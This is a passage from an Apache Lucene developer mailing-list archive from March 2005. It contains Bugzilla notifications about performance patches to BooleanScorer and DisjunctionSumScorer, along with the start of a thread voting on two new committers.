performance measurements on disjunctions, the run times of BooleanScorer with and without skipTo allowed hardly differed. With this change, the sorting is also done in the score(HitCollector, maxDoc) method, and the measurements now show that this slows down the internal runtime of BooleanScorer roughly by a factor 5. This is more than expected, probably due to the simplistic implementation of the sorting. -- Configure bugmail: http://issues.apache.org/bugzilla/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are the assignee for the bug, or are watching the assignee. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Sat Mar 26 22:24:22 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 4802 invoked from network); 26 Mar 2005 22:24:22 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 26 Mar 2005 22:24:22 -0000 Received: (qmail 50504 invoked by uid 500); 26 Mar 2005 22:24:21 -0000 Delivered-To: [email protected] Received: (qmail 50182 invoked by uid 500); 26 Mar 2005 22:24:19 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 50165 invoked by uid 500); 26 Mar 2005 22:24:19 -0000 Delivered-To: [email protected] Received: (qmail 50161 invoked by uid 99); 26 Mar 2005 22:24:19 -0000 X-ASF-Spam-Status: No, hits=0.2 required=10.0 tests=NO_REAL_NAME X-Spam-Check-By: apache.org Received: from ajax-1.apache.org (HELO ajax.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Sat, 26 Mar 2005 14:24:18 -0800 Received: by ajax.apache.org (Postfix, from userid 99) id 9991E28A; Sat, 26 Mar 2005 23:24:15 +0100 (CET) From: [email protected] To: [email protected] Subject: DO NOT REPLY [Bug 34193] New: - [PATCH] Performance improvement to DisjunctionSumScorer X-Bugzilla-Reason: AssignedTo Message-Id: <[email protected]> Date: Sat, 26 Mar 2005 23:24:15 +0100 (CET) X-Virus-Checked: Checked X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG· RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT <http://issues.apache.org/bugzilla/show_bug.cgi?id=34193>. ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED AND· INSERTED IN THE BUG DATABASE. http://issues.apache.org/bugzilla/show_bug.cgi?id=34193 Summary: [PATCH] Performance improvement to DisjunctionSumScorer Product: Lucene Version: CVS Nightly - Specify date in submission Platform: Other OS/Version: other Status: NEW Severity: normal Priority: P2 Component: Search AssignedTo: [email protected] ReportedBy: [email protected] A recent profile of the new BooleanScorer2 showed that quite a bit of CPU time is spent in the advanceAfterCurrent method of DisjunctionScorer, and in the PriorityQueue of scorers that is used there. This patch reduces the internal overhead of DisjunctionScorer to about 70% of the current one (ie. 30% saving in cpu time). It also reduces the number of calls to the subscorers, but that was not measured. To get this, it was necessary to specialize the PriorityQueue for a Scorer and to add move some code fragments from DisjunctionScorer to this specialized queue. -- Configure bugmail: http://issues.apache.org/bugzilla/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are the assignee for the bug, or are watching the assignee. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Sat Mar 26 22:26:59 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 5123 invoked from network); 26 Mar 2005 22:26:59 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 26 Mar 2005 22:26:59 -0000 Received: (qmail 53764 invoked by uid 500); 26 Mar 2005 22:26:58 -0000 Delivered-To: [email protected] Received: (qmail 53432 invoked by uid 500); 26 Mar 2005 22:26:57 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 53419 invoked by uid 500); 26 Mar 2005 22:26:57 -0000 Delivered-To: [email protected] Received: (qmail 53416 invoked by uid 99); 26 Mar 2005 22:26:56 -0000 X-ASF-Spam-Status: No, hits=0.4 required=10.0 tests=NO_REAL_NAME,UPPERCASE_25_50 X-Spam-Check-By: apache.org Received: from ajax-1.apache.org (HELO ajax.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Sat, 26 Mar 2005 14:26:56 -0800 Received: by ajax.apache.org (Postfix, from userid 99) id 1E12F28A; Sat, 26 Mar 2005 23:26:53 +0100 (CET) From: [email protected] To: [email protected] Subject: DO NOT REPLY [Bug 34193] - [PATCH] Performance improvement to DisjunctionSumScorer X-Bugzilla-Reason: AssignedTo Message-Id: <[email protected]> Date: Sat, 26 Mar 2005 23:26:53 +0100 (CET) X-Virus-Checked: Checked X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG· RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT <http://issues.apache.org/bugzilla/show_bug.cgi?id=34193>. ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED AND· INSERTED IN THE BUG DATABASE. http://issues.apache.org/bugzilla/show_bug.cgi?id=34193 ------- Additional Comments From [email protected] 2005-03-26 23:26 ------- Created an attachment (id=14570) --> (http://issues.apache.org/bugzilla/attachment.cgi?id=14570&action=view) A priority queue specialised for use in DisjunctionSumScorer This is in the org.apache.lucene.util package. It might be better in the search package, but that is a matter of taste. -- Configure bugmail: http://issues.apache.org/bugzilla/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are the assignee for the bug, or are watching the assignee. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Sat Mar 26 22:28:56 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 5305 invoked from network); 26 Mar 2005 22:28:56 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 26 Mar 2005 22:28:56 -0000 Received: (qmail 55318 invoked by uid 500); 26 Mar 2005 22:28:55 -0000 Delivered-To: [email protected] Received: (qmail 55274 invoked by uid 500); 26 Mar 2005 22:28:54 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 55259 invoked by uid 500); 26 Mar 2005 22:28:54 -0000 Delivered-To: [email protected] Received: (qmail 55256 invoked by uid 99); 26 Mar 2005 22:28:54 -0000 X-ASF-Spam-Status: No, hits=0.4 required=10.0 tests=NO_REAL_NAME,UPPERCASE_25_50 X-Spam-Check-By: apache.org Received: from ajax-1.apache.org (HELO ajax.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Sat, 26 Mar 2005 14:28:53 -0800 Received: by ajax.apache.org (Postfix, from userid 99) id CD16F28A; Sat, 26 Mar 2005 23:28:50 +0100 (CET) From: [email protected] To: [email protected] Subject: DO NOT REPLY [Bug 34193] - [PATCH] Performance improvement to DisjunctionSumScorer X-Bugzilla-Reason: AssignedTo Message-Id: <[email protected]> Date: Sat, 26 Mar 2005 23:28:50 +0100 (CET) X-Virus-Checked: Checked X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG· RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT <http://issues.apache.org/bugzilla/show_bug.cgi?id=34193>. ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED AND· INSERTED IN THE BUG DATABASE. http://issues.apache.org/bugzilla/show_bug.cgi?id=34193 ------- Additional Comments From [email protected] 2005-03-26 23:28 ------- Created an attachment (id=14571) --> (http://issues.apache.org/bugzilla/attachment.cgi?id=14571&action=view) DisjunctionSumScorer.java adapted to use a new queue of scorers -- Configure bugmail: http://issues.apache.org/bugzilla/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are the assignee for the bug, or are watching the assignee. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Sat Mar 26 22:33:24 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 9077 invoked from network); 26 Mar 2005 22:33:24 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 26 Mar 2005 22:33:24 -0000 Received: (qmail 60733 invoked by uid 500); 26 Mar 2005 22:33:23 -0000 Delivered-To: [email protected] Received: (qmail 60254 invoked by uid 500); 26 Mar 2005 22:33:20 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 60232 invoked by uid 500); 26 Mar 2005 22:33:20 -0000 Delivered-To: [email protected] Received: (qmail 60227 invoked by uid 99); 26 Mar 2005 22:33:20 -0000 X-ASF-Spam-Status: No, hits=0.2 required=10.0 tests=NO_REAL_NAME X-Spam-Check-By: apache.org Received: from ajax-1.apache.org (HELO ajax.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Sat, 26 Mar 2005 14:33:19 -0800 Received: by ajax.apache.org (Postfix, from userid 99) id AC9E228A; Sat, 26 Mar 2005 23:33:16 +0100 (CET) From: [email protected] To: [email protected] Subject: DO NOT REPLY [Bug 34193] - [PATCH] Performance improvement to DisjunctionSumScorer X-Bugzilla-Reason: AssignedTo Message-Id: <[email protected]> Date: Sat, 26 Mar 2005 23:33:16 +0100 (CET) X-Virus-Checked: Checked X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG· RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT <http://issues.apache.org/bugzilla/show_bug.cgi?id=34193>. ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED AND· INSERTED IN THE BUG DATABASE. http://issues.apache.org/bugzilla/show_bug.cgi?id=34193 ------- Additional Comments From [email protected] 2005-03-26 23:33 ------- Created an attachment (id=14572) --> (http://issues.apache.org/bugzilla/attachment.cgi?id=14572&action=view) TestDisjunctionPerf1.java, some measurements on disjunctions of scorers This is probably not needed in the trunk. It was used to measure the differences in CPU time spent in BooleanScorer with and without skipTo and in DisjunctionScorer. It also contains the results of some of the measurements done, and some conclusions, all as comments. -- Configure bugmail: http://issues.apache.org/bugzilla/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are the assignee for the bug, or are watching the assignee. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Sat Mar 26 22:36:33 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 9748 invoked from network); 26 Mar 2005 22:36:32 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 26 Mar 2005 22:36:32 -0000 Received: (qmail 68126 invoked by uid 500); 26 Mar 2005 22:36:29 -0000 Delivered-To: [email protected] Received: (qmail 67787 invoked by uid 500); 26 Mar 2005 22:36:27 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 67769 invoked by uid 500); 26 Mar 2005 22:36:27 -0000 Delivered-To: [email protected] Received: (qmail 67754 invoked by uid 99); 26 Mar 2005 22:36:27 -0000 X-ASF-Spam-Status: No, hits=0.4 required=10.0 tests=NO_REAL_NAME,UPPERCASE_25_50 X-Spam-Check-By: apache.org Received: from ajax-1.apache.org (HELO ajax.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Sat, 26 Mar 2005 14:36:25 -0800 Received: by ajax.apache.org (Postfix, from userid 99) id 80F04288; Sat, 26 Mar 2005 23:36:23 +0100 (CET) From: [email protected] To: [email protected] Subject: DO NOT REPLY [Bug 33019] - [PATCH] BooleanScorer can score documents in non increasing order X-Bugzilla-Reason: AssignedTo Message-Id: <[email protected]> Date: Sat, 26 Mar 2005 23:36:23 +0100 (CET) X-Virus-Checked: Checked X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG· RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT <http://issues.apache.org/bugzilla/show_bug.cgi?id=33019>. ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED AND· INSERTED IN THE BUG DATABASE. http://issues.apache.org/bugzilla/show_bug.cgi?id=33019 [email protected] changed: What |Removed |Added ---------------------------------------------------------------------------- OtherBugsDependingO| |34193 nThis| | -- Configure bugmail: http://issues.apache.org/bugzilla/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are the assignee for the bug, or are watching the assignee. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Sat Mar 26 22:36:33 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 9744 invoked from network); 26 Mar 2005 22:36:32 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 26 Mar 2005 22:36:32 -0000 Received: (qmail 68012 invoked by uid 500); 26 Mar 2005 22:36:28 -0000 Delivered-To: [email protected] Received: (qmail 67770 invoked by uid 500); 26 Mar 2005 22:36:27 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 67753 invoked by uid 500); 26 Mar 2005 22:36:27 -0000 Delivered-To: [email protected] Received: (qmail 67750 invoked by uid 99); 26 Mar 2005 22:36:27 -0000 X-ASF-Spam-Status: No, hits=0.4 required=10.0 tests=NO_REAL_NAME,UPPERCASE_25_50 X-Spam-Check-By: apache.org Received: from ajax-1.apache.org (HELO ajax.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Sat, 26 Mar 2005 14:36:25 -0800 Received: by ajax.apache.org (Postfix, from userid 99) id 6BE9C28A; Sat, 26 Mar 2005 23:36:23 +0100 (CET) From: [email protected] To: [email protected] Subject: DO NOT REPLY [Bug 34193] - [PATCH] Performance improvement to DisjunctionSumScorer X-Bugzilla-Reason: AssignedTo Message-Id: <[email protected]> Date: Sat, 26 Mar 2005 23:36:23 +0100 (CET) X-Virus-Checked: Checked X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG· RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT <http://issues.apache.org/bugzilla/show_bug.cgi?id=34193>. ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED AND· INSERTED IN THE BUG DATABASE. http://issues.apache.org/bugzilla/show_bug.cgi?id=34193 [email protected] changed: What |Removed |Added ---------------------------------------------------------------------------- BugsThisDependsOn| |33019 ------- Additional Comments From [email protected] 2005-03-26 23:36 ------- The priority queue is named ScorerDocQueue.java TestDisjunctionPerf1.java depends on the BooleanScorer.java posted in bug 33019 for correctly (hopefully) sorting the documents to allow skipTo(). -- Configure bugmail: http://issues.apache.org/bugzilla/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are the assignee for the bug, or are watching the assignee. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Sun Mar 27 15:38:17 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 65807 invoked from network); 27 Mar 2005 15:38:16 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 27 Mar 2005 15:38:16 -0000 Received: (qmail 1050 invoked by uid 500); 27 Mar 2005 15:38:13 -0000 Delivered-To: [email protected] Received: (qmail 985 invoked by uid 500); 27 Mar 2005 15:38:12 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 963 invoked by uid 500); 27 Mar 2005 15:38:12 -0000 Delivered-To: [email protected] Received: (qmail 960 invoked by uid 99); 27 Mar 2005 15:38:12 -0000 X-ASF-Spam-Status: No, hits=0.4 required=10.0 tests=NO_REAL_NAME,UPPERCASE_25_50 X-Spam-Check-By: apache.org Received: from ajax-1.apache.org (HELO ajax.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Sun, 27 Mar 2005 07:38:11 -0800 Received: by ajax.apache.org (Postfix, from userid 99) id ECEBC299; Sun, 27 Mar 2005 17:38:08 +0200 (CEST) From: [email protected] To: [email protected] Subject: DO NOT REPLY [Bug 31785] - DisjunctionScorer X-Bugzilla-Reason: AssignedTo Message-Id: <[email protected]> Date: Sun, 27 Mar 2005 17:38:08 +0200 (CEST) X-Virus-Checked: Checked X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG· RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT <http://issues.apache.org/bugzilla/show_bug.cgi?id=31785>. ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED AND· INSERTED IN THE BUG DATABASE. http://issues.apache.org/bugzilla/show_bug.cgi?id=31785 [email protected] changed: What |Removed |Added ---------------------------------------------------------------------------- OtherBugsDependingO|33019 | nThis| | -- Configure bugmail: http://issues.apache.org/bugzilla/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are the assignee for the bug, or are watching the assignee. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Sun Mar 27 15:38:17 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 65821 invoked from network); 27 Mar 2005 15:38:16 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 27 Mar 2005 15:38:16 -0000 Received: (qmail 1167 invoked by uid 500); 27 Mar 2005 15:38:14 -0000 Delivered-To: [email protected] Received: (qmail 1009 invoked by uid 500); 27 Mar 2005 15:38:13 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 977 invoked by uid 500); 27 Mar 2005 15:38:12 -0000 Delivered-To: [email protected] Received: (qmail 964 invoked by uid 99); 27 Mar 2005 15:38:12 -0000 X-ASF-Spam-Status: No, hits=0.4 required=10.0 tests=NO_REAL_NAME,UPPERCASE_25_50 X-Spam-Check-By: apache.org Received: from ajax-1.apache.org (HELO ajax.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Sun, 27 Mar 2005 07:38:11 -0800 Received: by ajax.apache.org (Postfix, from userid 99) id B101228A; Sun, 27 Mar 2005 17:38:08 +0200 (CEST) From: [email protected] To: [email protected] Subject: DO NOT REPLY [Bug 33019] - [PATCH] BooleanScorer can score documents in non increasing order X-Bugzilla-Reason: AssignedTo Message-Id: <[email protected]> Date: Sun, 27 Mar 2005 17:38:08 +0200 (CEST) X-Virus-Checked: Checked X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG· RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT <http://issues.apache.org/bugzilla/show_bug.cgi?id=33019>. ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED AND· INSERTED IN THE BUG DATABASE. http://issues.apache.org/bugzilla/show_bug.cgi?id=33019 [email protected] changed: What |Removed |Added ---------------------------------------------------------------------------- BugsThisDependsOn|31785 | ------- Additional Comments From [email protected] 2005-03-27 17:38 ------- Removed dependency on fixed bug 31785 -- Configure bugmail: http://issues.apache.org/bugzilla/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are the assignee for the bug, or are watching the assignee. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Sun Mar 27 20:02:04 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 92462 invoked from network); 27 Mar 2005 20:02:04 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 27 Mar 2005 20:02:04 -0000 Received: (qmail 59968 invoked by uid 500); 27 Mar 2005 20:02:02 -0000 Delivered-To: [email protected] Received: (qmail 59939 invoked by uid 500); 27 Mar 2005 20:02:02 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 59923 invoked by uid 99); 27 Mar 2005 20:02:02 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: local policy) Received: from Unknown (HELO ehatchersolutions.com) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Sun, 27 Mar 2005 12:02:00 -0800 Received: by ehatchersolutions.com (Postfix, from userid 504) id AE7CE13E2008; Sun, 27 Mar 2005 15:01:56 -0500 (EST) Received: from [161.129.204.104] (va-chrvlle-cad1-bdgrp1-4b-b-169.chvlva.adelphia.net [161.129.204.104]) by ehatchersolutions.com (Postfix) with ESMTP id E187713E2007; Sun, 27 Mar 2005 15:01:24 -0500 (EST) Mime-Version: 1.0 (Apple Message framework v619.2) Content-Type: text/plain; charset=US-ASCII; format=flowed Message-Id: <[email protected]> Content-Transfer-Encoding: 7bit Cc: Andi Vajda <[email protected]>, [email protected] From: Erik Hatcher <[email protected]> Subject: [VOTE] Two new committers Date: Sun, 27 Mar 2005 15:01:28 -0500 To: [email protected] X-Mailer: Apple Mail (2.619.2) X-Spam-Checker-Version: SpamAssassin 3.0.1 (2004-10-22) on javelina X-Spam-Status: No, score=-1.3 required=5.0 tests=AWL,BAYES_00, RCVD_IN_NJABL_DUL,RCVD_IN_SORBS_DUL autolearn=no version=3.0.1 X-Spam-Level: X-Virus-Checked: Checked X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N I propose two separate votes here. * Andi Vajda for committer-ship on the /contrib/db directory tree for his continued maintenance of DBDirectory, which OSAF is making solid use of within Chandler. * Brian McCallister for commiter-ship on a new /ruby directory tree to begin work from scratch on a GCJ/SWIG-based version of Lucene for Ruby. With Subversion, and Doug's control over write privileges at a fine-grained level, we have the capability to add committers to specific areas of the repository. We should leverage it! I'm +1 to both. I've CC'd both Andi and Brian. Andi - please get the ball rolling on getting an Apache CLA on file (this process can take days or even weeks to get recorded properly). http://www.apache.org/licenses/#clas - I spoke with Andi about this when I visited PyCon last week to meet him in person and we both feel that DBDirectory deserves some attention and care. Erik --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Sun Mar 27 21:23:31 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 35350 invoked from network); 27 Mar 2005 21:23:31 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 27 Mar 2005 21:23:31 -0000 Received: (qmail 28281 invoked by uid 500); 27 Mar 2005 21:23:30 -0000 Delivered-To: [email protected] Received: (qmail 27829 invoked by uid 500); 27 Mar 2005 21:23:29 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 27811 invoked by uid 99); 27 Mar 2005 21:23:29 -0000 X-ASF-Spam-Status: No, hits=2.5 required=10.0 tests=DNS_FROM_RFC_ABUSE,FORGED_YAHOO_RCVD X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: local policy) Received: from web31106.mail.mud.yahoo.com (HELO web31106.mail.mud.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.28) with SMTP; Sun, 27 Mar 2005 13:23:25 -0800 Received: (qmail 40549 invoked by uid 60001); 27 Mar 2005 21:23:22 -0000 Comment: DomainKeys? See http://antispam.yahoo.com/domainkeys DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; b=s5v2qMSM7uUrkrNaa1jixB1FhrsSm8HkcGDsOHakR/apVGo/8JFgbhXeysPzfQoPjMVkS6UVvvYGKYg+MXuGzqCyEwtWRaFihXV8s98bsXLSvlaDs9N14GB5jLIg7tjopzVWP8uUe425H/jvR5RJakpxJ2dB0AhGJJatjNdXkN8= ; Message-ID: <[email protected]> Received: from [161.129.204.104] by web31106.mail.mud.yahoo.com via HTTP; Sun, 27 Mar 2005 13:23:22 PST Date: Sun, 27 Mar 2005 13:23:22 -0800 (PST) From: Otis Gospodnetic <[email protected]> Subject: Re: [VOTE] Two new committers To: [email protected] Cc: Andi Vajda <[email protected]>, [email protected] In-Reply-To: 6667 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Virus-Checked: Checked X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N 2 x +1. I'd also love to see PyLucene move towards Apache Incubator, but that's a separate thing. Otis --- Erik Hatcher <[email protected]> wrote: > I propose two separate votes here. > > * Andi Vajda for committer-ship on the /contrib/db directory tree > for > his continued maintenance of DBDirectory, which OSAF is making solid > use of within Chandler. > > * Brian McCallister for commiter-ship on a new /ruby directory tree > to > begin work from scratch on a GCJ/SWIG-based version of Lucene for > Ruby. > > With Subversion, and Doug's control over write privileges at a > fine-grained level, we have the capability to add committers to > specific areas of the repository. We should leverage it! > > I'm +1 to both. > > I've CC'd both Andi and Brian. Andi - please get the ball rolling on > > getting an Apache CLA on file (this process can take days or even > weeks > to get recorded properly). http://www.apache.org/licenses/#clas - I > > spoke with Andi about this when I visited PyCon last week to meet him > > in person and we both feel that DBDirectory deserves some attention > and > care. > > Erik > > > --------------------------------------------------------------------- > To unsubscribe, e-mail: [email protected] > For additional commands, e-mail: [email protected] > > --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Sun Mar 27 23:43:42 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 69962 invoked from network); 27 Mar 2005 23:43:42 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 27 Mar 2005 23:43:42 -0000 Received: (qmail 20703 invoked by uid 500); 27 Mar 2005 23:43:40 -0000 Delivered-To: [email protected] Received: (qmail 20669 invoked by uid 500); 27 Mar 2005 23:43:40 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 20654 invoked by uid 99); 27 Mar 2005 23:43:40 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: local policy) Received: from Unknown (HELO ehatchersolutions.com) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Sun, 27 Mar 2005 15:43:38 -0800 Received: by ehatchersolutions.com (Postfix, from userid 504) id D7EE213E2007; Sun, 27 Mar 2005 18:43:32 -0500 (EST) Received: from [161.129.204.104] (va-chrvlle-cad1-bdgrp1-4b-b-169.chvlva.adelphia.net [161.129.204.104]) by ehatchersolutions.com (Postfix) with ESMTP id 42EB613E2007; Sun, 27 Mar 2005 18:43:06 -0500 (EST) In-Reply-To: <[email protected]> References: <[email protected]> Mime-Version: 1.0 (Apple Message framework v619.2) Content-Type: text/plain; charset=US-ASCII; format=flowed Message-Id: <[email protected]> Content-Transfer-Encoding: 7bit Cc: Andi Vajda <[email protected]>, [email protected] From: Erik Hatcher <[email protected]> Subject: Re: [VOTE] Two new committers Date: Sun, 27 Mar 2005 18:43:02 -0500 To: [email protected] X-Mailer: Apple Mail (2.619.2) X-Spam-Checker-Version: SpamAssassin 3.0.1 (2004-10-22) on javelina X-Spam-Status: No, score=-1.3 required=5.0 tests=AWL,BAYES_00, RCVD_IN_NJABL_DUL,RCVD_IN_SORBS_DUL autolearn=no version=3.0.1 X-Spam-Level: X-Virus-Checked: Checked X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N I spoke with Andi about that very topic on Friday. OSAF and he are quite open and willing to do this, with the main reservation being the amount of hassle it would take to make the transition. Now that PyCon is over, I think he is interested in moving this forward. Otis, will you 